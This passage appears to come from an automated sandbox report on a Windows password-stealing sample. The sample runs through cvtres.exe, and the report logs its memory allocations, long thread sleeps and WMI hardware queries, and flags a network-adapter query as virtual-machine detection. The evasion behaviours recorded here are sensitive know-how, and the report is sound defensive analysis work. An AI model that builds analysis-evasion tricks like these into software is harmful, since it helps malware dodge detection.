                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 4CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 5CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 5DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 6DD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 7020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 8020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeMemory allocated: 9020000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 1360000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 3090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598434Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 598000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 597094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596295Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 596078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595968Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595310Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeThread delayed: delay time: 594547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWindow / User API: threadDelayed 9318Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe TID: 5348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -599094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598434s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598328s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598219s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598109s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -598000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597312s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -597094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596295s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -596078s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595968s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595640s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595531s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595422s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595310s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595203s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -595094s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -594984s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -594875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -594766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -594656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe TID: 4600Thread sleep time: -594547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
